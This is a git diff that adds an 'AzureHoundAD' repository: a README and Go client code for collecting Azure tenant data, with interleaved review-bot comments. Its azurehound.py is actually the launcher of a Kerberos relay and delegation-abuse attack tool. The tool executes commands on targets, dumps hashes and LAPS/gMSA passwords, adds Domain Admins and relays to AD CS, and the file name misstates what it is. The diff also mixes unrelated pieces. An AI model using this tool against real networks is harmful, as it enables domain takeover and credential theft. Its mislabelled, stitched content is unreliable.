Resources](https://github.com/vitalysim/Awesome-Hacking-Resources) | Collection of hacking / penetration testing resources to make you better! -[Honeypots](https://github.com/paralax/awesome-honeypots) | List of honeypot resources -[Incident Response](https://github.com/meirwah/awesome-incident-response) | List of tools for incident response -[Industrial Control System Security](https://github.com/hslatman/awesome-industrial-control-system-security) | List of resources related to Industrial Control System (ICS) security -[InfoSec](https://github.com/onlurking/awesome-infosec) | List of awesome infosec courses and training resources -[IoT Hacks](https://github.com/nebgnahz/awesome-iot-hacks) | Collection of Hacks in IoT Space -[Mainframe Hacking](https://github.com/samanL33T/Awesome-Mainframe-Hacking) | List of Awesome Mainframe Hacking/Pentesting Resources -[Malware Analysis](https://github.com/rshipp/awesome-malware-analysis) | List of awesome malware analysis tools and resources -[OSINT](https://github.com/jivoi/awesome-osint) | List of amazingly awesome Open Source Intelligence (OSINT) tools and resources -[OSX and iOS Security](https://github.com/ashishb/osx-and-ios-security-awesome) | OSX and iOS related security tools -[Pcaptools](https://github.com/caesar0301/awesome-pcaptools) | Collection of tools developed by researchers in the Computer Science area to process network traces -[Pentest](https://github.com/enaqx/awesome-pentest) | List of awesome penetration testing resources, tools and other shiny things -[PHP Security](https://github.com/ziadoz/awesome-php#security) | Libraries for generating secure random numbers, encrypting data and scanning for vulnerabilities -[Real-time Communications hacking & pentesting resources](https://github.com/EnableSecurity/awesome-rtc-hacking) | Covers VoIP, WebRTC and VoLTE security related topics -[Red Teaming](https://github.com/yeyintminthuhtut/Awesome-Red-Teaming) | List of Awesome Red Team / Red Teaming Resources 
-[Reversing](https://github.com/fdivrp/awesome-reversing) | List of awesome reverse engineering resources -[Reinforcement Learning for Cyber Security](https://github.com/Limmen/awesome-rl-for-cybersecurity) | List of awesome reinforcement learning for security resources -[Sec Talks](https://github.com/PaulSec/awesome-sec-talks) | List of awesome security talks -[SecLists](https://github.com/danielmiessler/SecLists) | Collection of multiple types of lists used during security assessments -[Security](https://github.com/sbilly/awesome-security) | Collection of awesome software, libraries, documents, books, resources and cools stuffs about security -[Serverless Security](https://github.com/puresec/awesome-serverless-security/) | Collection of Serverless security related resources -[Social Engineering](https://github.com/v2-dev/awesome-social-engineering) | List of awesome social engineering resources -[Static Analysis](https://github.com/mre/awesome-static-analysis) | List of static analysis tools, linters and code quality checkers for various programming languages -[The Art of Hacking Series](https://github.com/The-Art-of-Hacking/h4cker) | List of resources includes thousands of cybersecurity-related references and resources -[Threat Intelligence](https://github.com/hslatman/awesome-threat-intelligence) | List of Awesome Threat Intelligence resources -[Vehicle Security](https://github.com/jaredthecoder/awesome-vehicle-security) | List of resources for learning about vehicle security and car hacking -[Vulnerability Research](https://github.com/re-pronin/awesome-vulnerability-research) | List of resources about Vulnerability Research -[Web Hacking](https://github.com/infoslack/awesome-web-hacking) | List of web application security -[Windows Exploitation - Advanced](https://github.com/yeyintminthuhtut/Awesome-Advanced-Windows-Exploitation-References) | List of Awesome Advanced Windows Exploitation References -[WiFi Arsenal](https://github.com/0x90/wifi-arsenal) | Pack 
of various useful/useless tools for 802.11 hacking -[YARA](https://github.com/InQuest/awesome-yara) | List of awesome YARA rules, tools, and people -[Hacker Roadmap](https://github.com/sundowndev/hacker-roadmap) | A guide for amateur pen testers and a collection of hacking tools, resources and references to practice ethical hacking. - -## Other Useful Repositories - -Repository | Description ----- | ---- -[Adversarial Machine Learning](https://github.com/yenchenlin/awesome-adversarial-machine-learning) | Curated list of awesome adversarial machine learning resources -[AI Security](https://github.com/RandomAdversary/Awesome-AI-Security) | Curated list of AI security resources -[API Security Checklist](https://github.com/shieldfy/API-Security-Checklist) | Checklist of the most important security countermeasures when designing, testing, and releasing your API -[APT Notes](https://github.com/kbandla/APTnotes) | Various public documents, whitepapers and articles about APT campaigns -[Bug Bounty Reference](https://github.com/ngalongc/bug-bounty-reference) | List of bug bounty write-up that is categorized by the bug nature -[Cryptography](https://github.com/sobolevn/awesome-cryptography) | Cryptography resources and tools -[CTF Tool](https://github.com/SandySekharan/CTF-tool) | List of Capture The Flag (CTF) frameworks, libraries, resources and softwares -[CVE PoC](https://github.com/qazbnm456/awesome-cve-poc) | List of CVE Proof of Concepts (PoCs) -[CVE PoC updated daily](https://github.com/trickest/cve) | List of CVE Proof of Concepts (PoCs) updated daily by Trickest -[Detection Lab](https://github.com/clong/DetectionLab) | Vagrant & Packer scripts to build a lab environment complete with security tooling and logging best practices -[Forensics](https://github.com/Cugu/awesome-forensics) | List of awesome forensic analysis tools and resources -[Free Programming Books](https://github.com/EbookFoundation/free-programming-books) | Free programming books for developers 
-[Gray Hacker Resources](https://github.com/bt3gl/Gray-Hacker-Resources) | Useful for CTFs, wargames, pentesting -[GTFOBins](https://gtfobins.github.io) | A curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions -[Hacker101](https://github.com/Hacker0x01/hacker101) | A free class for web security by HackerOne -[Infosec Getting Started](https://github.com/gradiuscypher/infosec_getting_started) | A collection of resources, documentation, links, etc to help people learn about Infosec -[Infosec Reference](https://github.com/rmusser01/Infosec_Reference) | Information Security Reference That Doesn't Suck -[IOC](https://github.com/sroberts/awesome-iocs) | Collection of sources of indicators of compromise -[Linux Kernel Exploitation](https://github.com/xairy/linux-kernel-exploitation) | A bunch of links related to Linux kernel fuzzing and exploitation -[Lockpicking](https://github.com/meitar/awesome-lockpicking) | Resources relating to the security and compromise of locks, safes, and keys. 
-[Machine Learning for Cyber Security](https://github.com/jivoi/awesome-ml-for-cybersecurity) | Curated list of tools and resources related to the use of machine learning for cyber security -[Payloads](https://github.com/foospidy/payloads) | Collection of web attack payloads -[PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings) | List of useful payloads and bypass for Web Application Security and Pentest/CTF -[Pentest Cheatsheets](https://github.com/coreb1t/awesome-pentest-cheat-sheets) | Collection of the cheat sheets useful for pentesting -[Pentest Wiki](https://github.com/nixawk/pentest-wiki) | A free online security knowledge library for pentesters / researchers -[Probable Wordlists](https://github.com/berzerk0/Probable-Wordlists) | Wordlists sorted by probability originally created for password generation and testing -[Resource List](https://github.com/FuzzySecurity/Resource-List) | Collection of useful GitHub projects loosely categorised -[Reverse Engineering](https://github.com/onethawt/reverseengineering-reading-list) | List of Reverse Engineering articles, books, and papers -[RFSec-ToolKit](https://github.com/cn0xroot/RFSec-ToolKit) | Collection of Radio Frequency Communication Protocol Hacktools -[Security Cheatsheets](https://github.com/andrewjkerr/security-cheatsheets) | Collection of cheatsheets for various infosec tools and topics -[Security List](https://github.com/zbetcheckin/Security_list) | Great security list for fun and profit -[Shell](https://github.com/alebcay/awesome-shell) | List of awesome command-line frameworks, toolkits, guides and gizmos to make complete use of shell -[ThreatHunter-Playbook](https://github.com/Cyb3rWard0g/ThreatHunter-Playbook) | A Threat hunter's playbook to aid the development of techniques and hypothesis for hunting campaigns -[Web Security](https://github.com/qazbnm456/awesome-web-security) | Curated list of Web Security materials and resources -[Vulhub](https://github.com/vulhub/vulhub) | 
Pre-Built Vulnerable Environments Based on Docker-Compose +# AzureHoundAD + +The BloodHound data collector for Microsoft Azure + +![GitHub Workflow Status](https://img.shields.io/github/actions/workflow/status/byt3n33dl3/AzureHoundAD/build.yml) +![GitHub release (latest SemVer)](https://img.shields.io/github/v/release/byt3n33dl3/AzureHoundAD) +![GitHub all releases](https://img.shields.io/github/downloads/byt3n33dl3/AzureHoundAD/total) +[![Documentation](https://img.shields.io/static/v1?label=&message=documentation&color=blue)](https://pkg.go.dev/github.com/byt3n33dl3/azurehoundad) + +## Get AzureHoundAD + +#### Release Binaries + +Download the appropriate binary for your platform from one of our [Releases](https://github.com/byt3n33dl3/AzureHoundAD/releases). + +#### Rolling Release + +The rolling release contains pre-built binaries that are automatically kept up-to-date with the `main` branch and can be downloaded from +[here](https://github.com/byt3n33dl3/AzureHoundAD/releases/tag/rolling). + +> **Warning:** The rolling release may be unstable. 
+ +## Compiling + +#### Prerequisites + +- [Go 1.18](https://go.dev/dl) or later + +To build this project from source run the following: + +```sh +go build -ldflags="-s -w -X github.com/byt3n33dl3/AzureHoundAD/v2/constants.Version=`git describe tags --exact-match 2> /dev/null || git rev-parse HEAD`" +``` + +## Usage + +#### Quickstart + +**Print all Azure Tenant data to stdout** + +```sh +❯ azurehound list -u "$USERNAME" -p "$PASSWORD" -t "$TENANT" +``` + +**Print all Azure Tenant data to file** + +```sh +❯ azurehound list -u "$USERNAME" -p "$PASSWORD" -t "$TENANT" -o "mytenant.json" +``` + +**Configure and start data collection service for BloodHound Enterprise** + +```sh +❯ azurehound configure +(follow prompts) + +❯ azurehound start +``` + +## CLI + +``` +❯ azurehound --help +AzureHound vx.x.x +Created by the BloodHound Enterprise team - https://bloodhoundenterprise.io + +The official tool for collecting Azure data for BloodHound and BloodHound Enterprise + +Usage: + azurehound [command] + +Available Commands: + completion Generate the autocompletion script for the specified shell + configure Configure AzureHound + help Help about any command + list Lists Azure Objects + start Start Azure data collection service for BloodHound Enterprise + +Flags: + -c, --config string AzureHound configuration file (default: /Users/dlees/.config/azurehound/config.json) + -h, --help help for azurehound + --json Output logs as json + -j, --jwt string Use an acquired JWT to authenticate into Azure + --log-file string Output logs to this file + --proxy string Sets the proxy URL for the AzureHound service + -r, --refresh-token string Use an acquired refresh token to authenticate into Azure + -v, --verbosity int AzureHound verbosity level (defaults to 0) [Min: -1, Max: 2] + --version version for azurehound + +Use "azurehound [command] --help" for more information about a command. +``` diff --git a/azurehound.py b/azurehound.py new file mode 100644 index 0000000..8cc028e --- /dev/null 
+++ b/azurehound.py 
@@ -0,0 +1,261 @@ +#!/usr/bin/env python +#################### +# +# Copyright (c) 2020 Dirk-jan Mollema (@_dirkjan) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. +# +#################### +# +# This tool is based on ntlmrelayx, part of Impacket +# Copyright (c) 2013-2018 SecureAuth Corporation +# +# Impacket is provided under under a slightly modified version +# of the Apache Software License. +# See https://github.com/SecureAuthCorp/impacket/blob/master/LICENSE +# for more information. 
+# +# +# Ntlmrelayx authors: +# Alberto Solino (@agsolino) +# Dirk-jan Mollema / Outsider Security (www.outsidersecurity.nl) +# + +import argparse +import sys +import binascii +import logging + +from impacket.examples import logger +from impacket.examples.ntlmrelayx.attacks import PROTOCOL_ATTACKS +from impacket.examples.ntlmrelayx.utils.targetsutils import TargetsProcessor, TargetsFileWatcher + +from lib.servers import SMBRelayServer, HTTPKrbRelayServer, DNSRelayServer +from lib.utils.config import KrbRelayxConfig + +RELAY_SERVERS = ( SMBRelayServer, HTTPKrbRelayServer, DNSRelayServer ) + +def stop_servers(threads): + todelete = [] + for thread in threads: + if isinstance(thread, RELAY_SERVERS): + thread.server.shutdown() + todelete.append(thread) + # Now remove threads from the set + for thread in todelete: + threads.remove(thread) + del thread + +def main(): + def start_servers(options, threads): + for server in RELAY_SERVERS: + #Set up config + c = KrbRelayxConfig() + c.setProtocolClients(PROTOCOL_CLIENTS) + c.setTargets(targetSystem) + c.setExeFile(options.e) + c.setCommand(options.c) + c.setEnumLocalAdmins(options.enum_local_admins) + c.setEncoding(codec) + c.setMode(mode) + c.setAttacks(PROTOCOL_ATTACKS) + c.setLootdir(options.lootdir) + c.setLDAPOptions(options.no_dump, options.no_da, options.no_acl, options.no_validate_privs, options.escalate_user, options.add_computer, options.delegate_access, options.dump_laps, options.dump_gmsa, options.dump_adcs, options.sid) + c.setIPv6(options.ipv6) + c.setWpadOptions(options.wpad_host, options.wpad_auth_num) + c.setSMB2Support(not options.no_smb2support) + c.setInterfaceIp(options.interface_ip) + if options.krbhexpass and not options.krbpass: + c.setAuthOptions(options.aesKey, options.hashes, options.dc_ip, binascii.unhexlify(options.krbhexpass), options.krbsalt, True) + else: + c.setAuthOptions(options.aesKey, options.hashes, options.dc_ip, options.krbpass, options.krbsalt, False) + c.setKrbOptions(options.format, 
options.victim) + c.setIsADCSAttack(options.adcs) + c.setADCSOptions(options.template) + + #If the redirect option is set, configure the HTTP server to redirect targets to SMB + if server is HTTPKrbRelayServer and options.r is not None: + c.setMode('REDIRECT') + c.setRedirectHost(options.r) + + s = server(c) + s.start() + threads.add(s) + return c + + # Init the example's logger theme + logger.init() + + #Parse arguments + parser = argparse.ArgumentParser(add_help=False, + description="Kerberos relay and unconstrained delegation abuse tool. " + "By @_dirkjan / dirkjanm.io") + parser._optionals.title = "Main options" + + #Main arguments + parser.add_argument("-h", "--help", action="help", help='show this help message and exit') + parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON') + parser.add_argument('-t', "--target", action='store', metavar = 'TARGET', help='Target to attack, ' + 'since this is Kerberos, only HOSTNAMES are valid. Example: smb://server:445 If unspecified, will store tickets for later use.') + parser.add_argument('-tf', action='store', metavar = 'TARGETSFILE', help='File that contains targets by hostname or ' + 'full URL, one per line') + parser.add_argument('-w', action='store_true', help='Watch the target file for changes and update target list ' + 'automatically (only valid with -tf)') + + # Interface address specification + parser.add_argument('-ip', '--interface-ip', action='store', metavar='INTERFACE_IP', help='IP address of interface to ' + 'bind SMB and HTTP servers',default='') + + parser.add_argument('-r', action='store', metavar='SMBSERVER', help='Redirect HTTP requests to a file:// path on SMBSERVER') + parser.add_argument('-l', '--lootdir', action='store', type=str, required=False, metavar='LOOTDIR', default='.', help='Loot ' + 'directory in which gathered loot (TGTs or dumps) will be stored (default: current directory).') + parser.add_argument('-f', '--format', default='ccache', choices=['ccache', 'kirbi'], 
action='store',help='Format to store tickets in. Valid: ccache (Impacket) or kirbi' + ' (Mimikatz format) default: ccache') + parser.add_argument('-codec', action='store', help='Sets encoding used (codec) from the target\'s output (default ' + '"%s"). If errors are detected, run chcp.com at the target, ' + 'map the result with ' + 'https://docs.python.org/2.4/lib/standard-encodings.html and then execute ntlmrelayx.py ' + 'again with -codec and the corresponding codec ' % sys.getdefaultencoding()) + parser.add_argument('-no-smb2support', action="store_false", default=False, help='Disable SMB2 Support') + + parser.add_argument('-wh', '--wpad-host', action='store', help='Enable serving a WPAD file for Proxy Authentication attack, ' + 'setting the proxy host to the one supplied.') + parser.add_argument('-wa', '--wpad-auth-num', action='store', help='Prompt for authentication N times for clients without MS16-077 installed ' + 'before serving a WPAD file.') + parser.add_argument('-6', '--ipv6', action='store_true', help='Listen on both IPv6 and IPv4') + + # Authentication arguments + group = parser.add_argument_group('Kerberos Keys (of your account with unconstrained delegation)') + group.add_argument('-p', '--krbpass', action="store", metavar="PASSWORD", help='Account password') + group.add_argument('-hp', '--krbhexpass', action="store", metavar="HEXPASSWORD", help='Hex-encoded password') + group.add_argument('-s', '--krbsalt', action="store", metavar="USERNAME", help='Case sensitive (!) salt. Used to calculate Kerberos keys.' + 'Only required if specifying password instead of keys.') + group.add_argument('-hashes', action="store", metavar="LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH') + group.add_argument('-aesKey', action="store", metavar="hex key", help='AES key to use for Kerberos Authentication ' + '(128 or 256 bits)') + group.add_argument('-dc-ip', action='store', metavar="ip address", help='IP Address of the domain controller. 
If ' + 'ommited it use the domain part (FQDN) specified in the target parameter') + + #SMB arguments + smboptions = parser.add_argument_group("SMB attack options") + + smboptions.add_argument('-e', action='store', required=False, metavar='FILE', help='File to execute on the target system. ' + 'If not specified, hashes will be dumped (secretsdump.py must be in the same directory)') + smboptions.add_argument('-c', action='store', type=str, required=False, metavar='COMMAND', help='Command to execute on ' + 'target system. If not specified, hashes will be dumped (secretsdump.py must be in the same ' + 'directory).') + smboptions.add_argument('--enum-local-admins', action='store_true', required=False, help='If relayed user is not admin, attempt SAMR lookup to see who is (only works pre Win 10 Anniversary)') + + #LDAP options + ldapoptions = parser.add_argument_group("LDAP attack options") + ldapoptions.add_argument('--no-dump', action='store_false', required=False, help='Do not attempt to dump LDAP information') + ldapoptions.add_argument('--no-da', action='store_false', required=False, help='Do not attempt to add a Domain Admin') + ldapoptions.add_argument('--no-acl', action='store_false', required=False, help='Disable ACL attacks') + ldapoptions.add_argument('--no-validate-privs', action='store_false', required=False, help='Do not attempt to enumerate privileges, assume permissions are granted to escalate a user via ACL attacks') + ldapoptions.add_argument('--escalate-user', action='store', required=False, help='Escalate privileges of this user instead of creating a new one') + ldapoptions.add_argument('--add-computer', action='store', metavar='COMPUTERNAME', required=False, const='Rand', nargs='?', help='Attempt to add a new computer account') + ldapoptions.add_argument('--delegate-access', action='store_true', required=False, help='Delegate access on relayed computer account to the specified account') + ldapoptions.add_argument('--sid', action='store_true', 
required=False, help='Use a SID to delegate access rather than an account name') + ldapoptions.add_argument('--dump-laps', action='store_true', required=False, help='Attempt to dump any LAPS passwords readable by the user') + ldapoptions.add_argument('--dump-gmsa', action='store_true', required=False, help='Attempt to dump any gMSA passwords readable by the user') + ldapoptions.add_argument('--dump-adcs', action='store_true', required=False, help='Attempt to dump ADCS enrollment services and certificate templates info') + + # AD CS options + adcsoptions = parser.add_argument_group("AD CS attack options") + adcsoptions.add_argument('--adcs', action='store_true', required=False, help='Enable AD CS relay attack') + adcsoptions.add_argument('--template', action='store', metavar="TEMPLATE", required=False, help='AD CS template. Defaults to Machine or User whether relayed account name ends with `$`. Relaying a DC should require specifying `DomainController`') + adcsoptions.add_argument('-v', "--victim", action='store', metavar = 'TARGET', help='Victim username or computername$, to request the correct certificate name.') + + try: + options = parser.parse_args() + except Exception as e: + logging.error(str(e)) + sys.exit(1) + + if options.debug is True: + logging.getLogger().setLevel(logging.DEBUG) + logging.getLogger('impacket.smbserver').setLevel(logging.DEBUG) + else: + logging.getLogger().setLevel(logging.INFO) + logging.getLogger('impacket.smbserver').setLevel(logging.ERROR) + + # Let's register the protocol clients we have + # ToDo: Do this better somehow + from lib.clients import PROTOCOL_CLIENTS + + + if options.codec is not None: + codec = options.codec + else: + codec = sys.getdefaultencoding() + + if options.target is not None: + logging.info("Running in attack mode to single host") + mode = 'ATTACK' + targetSystem = TargetsProcessor(singleTarget=options.target, protocolClients=PROTOCOL_CLIENTS) + else: + if options.tf is not None: + #Targetfile specified + 
logging.info("Running in attack mode to hosts in targetfile") + targetSystem = TargetsProcessor(targetListFile=options.tf, protocolClients=PROTOCOL_CLIENTS) + mode = 'ATTACK' + else: + logging.info("Running in export mode (all tickets will be saved to disk). Works with unconstrained delegation attack only.") + targetSystem = None + mode = 'EXPORT' + + if not options.krbpass and not options.krbhexpass and not options.hashes and not options.aesKey: + logging.info("Running in kerberos relay mode because no credentials were specified.") + if mode == 'EXPORT': + logging.error('You need to specify at least one relay target, or specify credentials to run in unconstrained delegation mode') + return + mode = 'RELAY' + else: + logging.info("Running in unconstrained delegation abuse mode using the specified credentials.") + + if options.r is not None: + logging.info("Running HTTP server in redirect mode") + + if targetSystem is not None and options.w: + watchthread = TargetsFileWatcher(targetSystem) + watchthread.start() + + threads = set() + + c = start_servers(options, threads) + + print("") + logging.info("Servers started, waiting for connections") + try: + sys.stdin.read() + except KeyboardInterrupt: + pass + else: + pass + + for s in threads: + del s + + sys.exit(0) + + + +# Process command-line arguments. +if __name__ == '__main__': + main() diff --git a/client/app_role_assignments.go b/client/app_role_assignments.go new file mode 100644 index 0000000..c497724 --- /dev/null +++ b/client/app_role_assignments.go 
@@ -0,0 +1,43 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package client
+
+import (
+ "context"
+ "fmt"
+
+ "github.com/bloodhoundad/azurehound/v2/client/query"
+ "github.com/bloodhoundad/azurehound/v2/constants"
+ "github.com/bloodhoundad/azurehound/v2/models/azure"
+)
+
+// GetAzureADAppRoleAssignments https://learn.microsoft.com/en-us/graph/api/serviceprincipal-list-approleassignedto?view=graph-rest-1.0
+func (s *azureClient) ListAzureADAppRoleAssignments(ctx context.Context, servicePrincipalId string, params query.GraphParams) <-chan AzureResult[azure.AppRoleAssignment] {
+ var (
+ out = make(chan AzureResult[azure.AppRoleAssignment])
+ path = fmt.Sprintf("/%s/servicePrincipals/%s/appRoleAssignedTo", constants.GraphApiVersion, servicePrincipalId)
+ )
+
+ if params.Top == 0 {
+ params.Top = 999
+ }
+
+ go getAzureObjectList[azure.AppRoleAssignment](s.msgraph, ctx, path, params, out)
+
+ return out
+}
diff --git a/client/apps.go b/client/apps.go
new file mode 100644
index 0000000..80ce4fa
--- /dev/null
+++ b/client/apps.go
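Review bot: `servicePrincipalId` is formatted straight into the request path in ListAzureADAppRoleAssignments, so a value containing `/`, `?` or `#` would change which Graph resource is requested; wrapping it as `url.PathEscape(servicePrincipalId)` keeps it a single path segment (this needs `net/url` in the import block). The same unescaped `%s` pattern appears for `objectId` in client/apps.go, client/devices.go and client/groups.go, and for `subscriptionId` in client/automation_accounts.go, client/container_registries.go and client/function_apps.go. Where these identifiers originate is not visible in this hunk, so treat this as hardening rather than a confirmed flaw. The doc comment also names `GetAzureADAppRoleAssignments` while the method is `ListAzureADAppRoleAssignments`; it should open with the method's actual name.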
@@ -0,0 +1,61 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package client
+
+import (
+ "context"
+ "encoding/json"
+ "fmt"
+
+ "github.com/bloodhoundad/azurehound/v2/client/query"
+ "github.com/bloodhoundad/azurehound/v2/constants"
+ "github.com/bloodhoundad/azurehound/v2/models/azure"
+)
+
+// ListAzureADApps https://learn.microsoft.com/en-us/graph/api/application-list?view=graph-rest-beta
+func (s *azureClient) ListAzureADApps(ctx context.Context, params query.GraphParams) <-chan AzureResult[azure.Application] {
+ var (
+ out = make(chan AzureResult[azure.Application])
+ path = fmt.Sprintf("/%s/applications", constants.GraphApiVersion)
+ )
+
+ if params.Top == 0 {
+ params.Top = 99
+ }
+
+ go getAzureObjectList[azure.Application](s.msgraph, ctx, path, params, out)
+
+ return out
+}
+
+// ListAzureADAppOwners https://learn.microsoft.com/en-us/graph/api/application-list-owners?view=graph-rest-beta
+func (s *azureClient) ListAzureADAppOwners(ctx context.Context, objectId string, params query.GraphParams) <-chan AzureResult[json.RawMessage] {
+
+ var (
+ out = make(chan AzureResult[json.RawMessage])
+ path = fmt.Sprintf("/%s/applications/%s/owners", constants.GraphApiBetaVersion, objectId)
+ )
+
+ if params.Top == 0 {
+ params.Top = 99
+ }
+
+ go getAzureObjectList[json.RawMessage](s.msgraph, ctx, path, params, out)
+
+ return out
+}
diff --git a/client/automation_accounts.go b/client/automation_accounts.go
new file mode 100644
index 0000000..67e8a23
--- /dev/null
+++ b/client/automation_accounts.go
@@ -0,0 +1,39 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package client
+
+import (
+ "context"
+ "fmt"
+
+ "github.com/bloodhoundad/azurehound/v2/client/query"
+ "github.com/bloodhoundad/azurehound/v2/models/azure"
+)
+
+// ListAzureAutomationAccounts https://learn.microsoft.com/en-us/rest/api/automation/automation-account/list?view=rest-automation-2021-06-22
+func (s *azureClient) ListAzureAutomationAccounts(ctx context.Context, subscriptionId string) <-chan AzureResult[azure.AutomationAccount] {
+ var (
+ out = make(chan AzureResult[azure.AutomationAccount])
+ path = fmt.Sprintf("/subscriptions/%s/providers/Microsoft.Automation/automationAccounts", subscriptionId)
+ params = query.RMParams{ApiVersion: "2021-06-22"}
+ )
+
+ go getAzureObjectList[azure.AutomationAccount](s.resourceManager, ctx, path, params, out)
+
+ return out
+}
diff --git a/client/client.go b/client/client.go
new file mode 100644
index 0000000..80e6401
--- /dev/null
+++ b/client/client.go
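Review bot: The comment on ListAzureADApps in client/apps.go links to the `graph-rest-beta` reference, but the path is built from `constants.GraphApiVersion`, while ListAzureADAppOwners uses `constants.GraphApiBetaVersion`; one of the two is probably out of date, and the values of those constants are not visible here. Either point the link at the version actually called or add a line such as `// Uses constants.GraphApiVersion; owners are fetched from the beta endpoint.` The default page size of 99 (versus 999 in client/app_role_assignments.go) is also unexplained and deserves a short comment, e.g. `// Top defaults to 99 when the caller leaves it at zero.`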
@@ -0,0 +1,232 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package client
+
+//go:generate go run go.uber.org/mock/mockgen -destination=./mocks/client.go -package=mocks . AzureClient
+
+import (
+ "context"
+ "encoding/json"
+ "fmt"
+ "net/http"
+ "net/url"
+
+ "github.com/bloodhoundad/azurehound/v2/client/config"
+ "github.com/bloodhoundad/azurehound/v2/client/query"
+ "github.com/bloodhoundad/azurehound/v2/client/rest"
+ "github.com/bloodhoundad/azurehound/v2/models/azure"
+ "github.com/bloodhoundad/azurehound/v2/panicrecovery"
+ "github.com/bloodhoundad/azurehound/v2/pipeline"
+)
+
+func NewClient(config config.Config) (AzureClient, error) {
+ if msgraph, err := rest.NewRestClient(config.GraphUrl(), config); err != nil {
+ return nil, err
+ } else if resourceManager, err := rest.NewRestClient(config.ResourceManagerUrl(), config); err != nil {
+ return nil, err
+ } else {
+ if config.JWT != "" {
+ if aud, err := rest.ParseAud(config.JWT); err != nil {
+ return nil, err
+ } else if aud == config.GraphUrl() {
+ return initClientViaGraph(msgraph, resourceManager)
+ } else if aud == config.ResourceManagerUrl() {
+ if body, err := rest.ParseBody(config.JWT); err != nil {
+ return nil, err
+ } else {
+ return initClientViaRM(msgraph, resourceManager, body["tid"])
+ }
+ } else {
+ return nil, fmt.Errorf("error: invalid token audience")
+ }
+ } else {
+ return initClientViaGraph(msgraph, resourceManager)
+ }
+ }
+}
+
+func initClientViaRM(msgraph, resourceManager rest.RestClient, tid interface{}) (AzureClient, error) {
+ client := &azureClient{
+ msgraph: msgraph,
+ resourceManager: resourceManager,
+ }
+ if result, err := client.GetAzureADTenants(context.Background(), true); err != nil {
+ return nil, err
+ } else {
+ for _, tenant := range result.Value {
+ if tenant.TenantId == tid.(string) {
+ client.tenant = tenant
+ break
+ }
+ }
+ return client, nil
+ }
+}
+
+func initClientViaGraph(msgraph, resourceManager rest.RestClient) (AzureClient, error) {
+ client := &azureClient{
+ msgraph: msgraph,
+ resourceManager: resourceManager,
+ }
+ if org, err := client.GetAzureADOrganization(context.Background(), nil); err != nil {
+ return nil, err
+ } else {
+ client.tenant = org.ToTenant()
+ return client, nil
+ }
+}
+
+type AzureResult[T any] struct {
+ Error error
+ Ok T
+}
+
+func getAzureObjectList[T any](client rest.RestClient, ctx context.Context, path string, params query.Params, out chan AzureResult[T]) {
+ defer panicrecovery.PanicRecovery()
+ defer close(out)
+
+ var (
+ errResult AzureResult[T]
+ nextLink string
+ )
+
+ for {
+ var (
+ list struct {
+ CountGraph int `json:"@odata.count,omitempty"` // The total count of all graph results
+ NextLinkGraph string `json:"@odata.nextLink,omitempty"` // The URL to use for getting the next set of graph values.
+ ContextGraph string `json:"@odata.context,omitempty"`
+ NextLinkRM string `json:"nextLink,omitempty"` // The URL to use for getting the next set of rm values.
+ Value []T `json:"value"` // A list of azure values
+ }
+ res *http.Response
+ err error
+ )
+
+ if nextLink != "" {
+ if nextUrl, err := url.Parse(nextLink); err != nil {
+ errResult.Error = err
+ _ = pipeline.Send(ctx.Done(), out, errResult)
+ return
+ } else {
+ paramsMap := make(map[string]string)
+ if params != nil {
+ paramsMap = params.AsMap()
+ }
